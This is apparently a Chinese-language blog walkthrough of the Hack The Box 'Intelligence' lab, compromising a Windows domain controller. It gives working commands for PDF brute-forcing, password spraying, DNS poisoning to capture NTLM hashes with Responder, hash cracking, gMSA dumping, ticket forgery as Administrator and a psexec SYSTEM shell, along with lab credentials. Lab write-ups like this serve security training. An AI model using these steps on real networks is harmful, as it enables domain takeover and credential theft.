HTB-Intelligence

Intelligence

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-07-30 12:05:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-30T11:00:26
| Not valid after:  2023-07-30T11:00:26
| MD5:   25ff 5c68 a2e6 3ca9 dcf3 9b41 3ae9 6655
| SHA-1: 5489 e5d4 27b3 2093 dc45 4f62 f15b 3fbe 7565 2de0
| -----BEGIN CERTIFICATE-----
| MIIF+zCCBOOgAwIBAgITcQAAAAPPcWVgWptCgAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBQMRMwEQYKCZImiZPyLGQBGRYDaHRiMRwwGgYKCZImiZPyLGQBGRYMaW50ZWxs
| aWdlbmNlMRswGQYDVQQDExJpbnRlbGxpZ2VuY2UtREMtQ0EwHhcNMjIwNzMwMTEw
| MDI2WhcNMjMwNzMwMTEwMDI2WjAeMRwwGgYDVQQDExNkYy5pbnRlbGxpZ2VuY2Uu
| aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3KqYdwLZP8PO3x/b
| vTistEns2pFho+yXV0Zrd+6VxKfleGwi6wfsfGRefTgtI6g/2J0+b/L25vFQ8v54
| TagRyp6j3zz+MQPqNMfhzOa5sk46l8jOAwGqJQUopiR+fGSnNloQ8GX0C2hIiO8d
| xHHEtzzmY/aYeEgw4WxcpN8kdERR8raJ8HCy2n/h2kGEHwmNwyIFOpTSgz5qIt2r
| lLB114Gg2W2V+v/NO6Xo0K47mYmdDm30yPnb2U/0anqrXy0K4llPZVOggyQfslQl
| UbErLo8Ydg/R5FbEE8K91TFe6yYM6XtnUxCfmOQHIHRaTU4X4+ieGC1w+ZA5mOhh
| 4bzuyQIDAQABo4IC/jCCAvowLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD
| AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
| ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC
| AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ
| YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNV
| HQ4EFgQUAXKY21Jf7rbyFjYIorNndx6R3PAwHwYDVR0jBBgwFoAUo2aX3GwKIqdG
| sKQv+8oXL8nKl8swgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6Ly8vQ049
| aW50ZWxsaWdlbmNlLURDLUNBLENOPWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl
| MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWludGVs
| bGlnZW5jZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29i
| amVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHJBggrBgEFBQcBAQSBvDCB
| uTCBtgYIKwYBBQUHMAKGgalsZGFwOi8vL0NOPWludGVsbGlnZW5jZS1EQy1DQSxD
| Tj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1pbnRlbGxpZ2VuY2UsREM9aHRiP2NBQ2VydGlmaWNh
| dGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MD8GA1Ud
| EQQ4MDagHwYJKwYBBAGCNxkBoBIEEIHijfJ5/cVAp3sSUrgFUO2CE2RjLmludGVs
| bGlnZW5jZS5odGIwDQYJKoZIhvcNAQELBQADggEBALQGskW7s/dIKd7Z7vEql4Oo
| H0+Y3qUp6RiJuB1offcbgI5HuD75tEL7g9Cf2nTEJWp4gf2DFhWKx2LcmuMit8De
| 64f9R17rlysaov8PFjq1u7Z1yCumAeK9DlYsGkaiLSNzlsaKYcpXJwdUQlERGO1Z
| h2kjhcOYioaDiJEGt2e0WzJgtSIOmUtFarOPTkPWnw8ze0sL2Hg1a0y5GgVt/sc3
| KC04G2kjy1rlDVgAFTIBokYBd2lwWV9sCXJq0jNgNhvaH59ofqLiRt1Pwipk5o1q
| /s5+WJrX5zSQG27gWWPephfAdAJWlAEb7MGw6JZGZ47OC+6UxaxSa9B546OZKI4=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-07-30T12:07:18+00:00; +7h00m00s from scanner time.
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-30T11:00:26
| Not valid after:  2023-07-30T11:00:26
| MD5:   25ff 5c68 a2e6 3ca9 dcf3 9b41 3ae9 6655
| SHA-1: 5489 e5d4 27b3 2093 dc45 4f62 f15b 3fbe 7565 2de0
| -----BEGIN CERTIFICATE-----
| MIIF+zCCBOOgAwIBAgITcQAAAAPPcWVgWptCgAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBQMRMwEQYKCZImiZPyLGQBGRYDaHRiMRwwGgYKCZImiZPyLGQBGRYMaW50ZWxs
| aWdlbmNlMRswGQYDVQQDExJpbnRlbGxpZ2VuY2UtREMtQ0EwHhcNMjIwNzMwMTEw
| MDI2WhcNMjMwNzMwMTEwMDI2WjAeMRwwGgYDVQQDExNkYy5pbnRlbGxpZ2VuY2Uu
| aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3KqYdwLZP8PO3x/b
| vTistEns2pFho+yXV0Zrd+6VxKfleGwi6wfsfGRefTgtI6g/2J0+b/L25vFQ8v54
| TagRyp6j3zz+MQPqNMfhzOa5sk46l8jOAwGqJQUopiR+fGSnNloQ8GX0C2hIiO8d
| xHHEtzzmY/aYeEgw4WxcpN8kdERR8raJ8HCy2n/h2kGEHwmNwyIFOpTSgz5qIt2r
| lLB114Gg2W2V+v/NO6Xo0K47mYmdDm30yPnb2U/0anqrXy0K4llPZVOggyQfslQl
| UbErLo8Ydg/R5FbEE8K91TFe6yYM6XtnUxCfmOQHIHRaTU4X4+ieGC1w+ZA5mOhh
| 4bzuyQIDAQABo4IC/jCCAvowLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD
| AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
| ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC
| AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ
| YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzAdBgNV
| HQ4EFgQUAXKY21Jf7rbyFjYIorNndx6R3PAwHwYDVR0jBBgwFoAUo2aX3GwKIqdG
| sKQv+8oXL8nKl8swgdAGA1UdHwSByDCBxTCBwqCBv6CBvIaBuWxkYXA6Ly8vQ049
| aW50ZWxsaWdlbmNlLURDLUNBLENOPWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl
| MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWludGVs
| bGlnZW5jZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29i
| amVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHJBggrBgEFBQcBAQSBvDCB
| uTCBtgYIKwYBBQUHMAKGgalsZGFwOi8vL0NOPWludGVsbGlnZW5jZS1EQy1DQSxD
| Tj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1pbnRlbGxpZ2VuY2UsREM9aHRiP2NBQ2VydGlmaWNh
| dGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MD8GA1Ud
| EQQ4MDagHwYJKwYBBAGCNxkBoBIEEIHijfJ5/cVAp3sSUrgFUO2CE2RjLmludGVs
| bGlnZW5jZS5odGIwDQYJKoZIhvcNAQELBQADggEBALQGskW7s/dIKd7Z7vEql4Oo
| H0+Y3qUp6RiJuB1offcbgI5HuD75tEL7g9Cf2nTEJWp4gf2DFhWKx2LcmuMit8De
| 64f9R17rlysaov8PFjq1u7Z1yCumAeK9DlYsGkaiLSNzlsaKYcpXJwdUQlERGO1Z
| h2kjhcOYioaDiJEGt2e0WzJgtSIOmUtFarOPTkPWnw8ze0sL2Hg1a0y5GgVt/sc3
| KC04G2kjy1rlDVgAFTIBokYBd2lwWV9sCXJq0jNgNhvaH59ofqLiRt1Pwipk5o1q
| /s5+WJrX5zSQG27gWWPephfAdAJWlAEb7MGw6JZGZ47OC+6UxaxSa9B546OZKI4=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-07-30T12:07:19+00:00; +7h00m00s from scanner time.
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49707/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49711/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
62578/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-07-30T12:06:38
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 11589/tcp): CLEAN (Timeout)
|   Check 2 (port 4953/tcp): CLEAN (Timeout)
|   Check 3 (port 35882/udp): CLEAN (Timeout)
|   Check 4 (port 21343/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

列舉

1
2
3
4
訪問首頁發現兩個pdf

http://10.10.10.248/documents/2020-12-15-upload.pdf
http://10.10.10.248/documents/2020-01-01-upload.pdf
  • exiftool 查看pdf資訊
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    exiftool 2020-12-15-upload.pdf

    ExifTool Version Number         : 12.44
    File Name                       : 2020-12-15-upload.pdf
    Directory                       : .
    File Size                       : 27 kB
    File Modification Date/Time     : 2021:04:01 13:00:00-04:00
    File Access Date/Time           : 2022:08:01 23:40:54-04:00
    File Inode Change Date/Time     : 2022:08:01 23:40:54-04:00
    File Permissions                : -rw-r--r--
    File Type                       : PDF
    File Type Extension             : pdf
    MIME Type                       : application/pdf
    PDF Version                     : 1.5
    Linearized                      : No
    Page Count                      : 1
    Creator                         : Jose.Williams
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
exiftool 2020-01-01-upload.pdf

ExifTool Version Number         : 12.44
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2022:08:01 23:40:46-04:00
File Inode Change Date/Time     : 2022:08:01 23:40:46-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee

  • Brutesploit 生成字典

    1
    ./datelist -b 2020-01-01 -e 2022-01-01 -f yyyymmdd -o date_wordlist.txt -s '-'

  • ffuf 爆破

    1
    ffuf -c -w date_wordlist.txt -u http://10.10.10.248/documents/FUZZ-upload.pdf

  • 試圖訪問所有存在的pdf文件,發現06-04的文件裡有密碼憑證

    1
    http://10.10.10.248/documents/2020-06-04-upload.pdf

  • 獲得使用者帳號

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    date.py 下載所有pdf

    import requests
    import os


    with open('date.txt','r') as f:
        line = f.read().split()

    for i in line:
        url = "http://10.10.10.248/documents/" + i + "-upload.pdf"
        print(url)

        os.system('wget ' + url)

  • exiftool 將所有創建者帳號蒐集

    1
    exiftool * | grep Creator | awk '{print $3}' > user.txt

  • 密碼噴灑

    1
    crackmapexec -t 64 smb -u user.txt -p 'NewIntelligenceCorpUser9876' -d 'intelligence.htb' 10.10.10.248

  • 帳密憑證

    1
    intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

  • cme確認smb share共享權限

    1
    crackmapexec -t 64 smb -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser876' --shares 10.10.10.248

  • 將IT的檔案載回本地 downdetector.ps1

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # Check web server status. Scheduled to run every 5min
    Import-Module ActiveDirectory 
    foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
    try {
    $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
    if(.StatusCode -ne 200) {
    Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
    }
    } catch {}
    }

  • dnstool發送假vhost 到zone

    1
    2
    3
    如在dns紀錄發現web開頭紀錄並訪問非200 將會發送mail至該record

    python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -d 10.10.14.13 -r 'webccc.intelligence.htb' 10.10.10.248

  • responder 捕獲發送的ntlm hash

    1
    responder -I tun0 -A

  • hashcat crack ntlm hash

    1
    2
    3
    hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt

    # Ted.Graves:Mr.Teddy

  • 重新查看pdf文件有無資訊

    1
    http://10.10.10.248/documents/2020-12-30-upload.pdf

  • bloodhound解析

    1
    到達svc_int最短路徑

1
Svc_int 到 DC路徑

  • GMSA Dumper

    1
    2
    3
    python3 gMSADumper.py -d intelligence.htb -u 'Ted.Graves' -p 'Mr.Teddy' -l 10.10.10.248

    svc_int$:::ee6ba16bad56e4fd9cc2a4156710cd2d

  • crackmapexec winrm

    1
    crackmapexec winrm 10.10.10.248 -u 'svc_int$' -H 'ee6ba16bad56e4fd9cc2a4156710cd2d'

  • pywerview 檢查機器服務

    1
    2
    3
    python3 ./pywerview.py get-netcomputer -u Ted.Graves -p Mr.Teddy -w intelligence.htb --computername svc_int.intelligence.htb -t 10.10.10.248 --full-data

    # WWW/dc.intelligence.htb

  • 生成sliver ticket

    1
    2
    3
    4
    5
    6
    apt install chrony
    timedatectl set-ntp true
    ntpdate 10.10.10.248

    # impacket 0.9.24
    python3 getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes :ee6ba16bad56e4fd9cc2a4156710cd2d

外殼(system)

1
2
3
export KRB5CCNAME=Administrator.ccache

python3 psexec.py -k -no-pass intelligence.htb/administrator@dc.intelligence.htb -target-ip 10.10.10.248
HTB > 靶機
#HackTheBox
HTB-Intelligence
https://luoming1995125.github.io/2022/09/20/HTB-Intelligence/
作者
Peter Luo
發布於
2022年9月20日
許可協議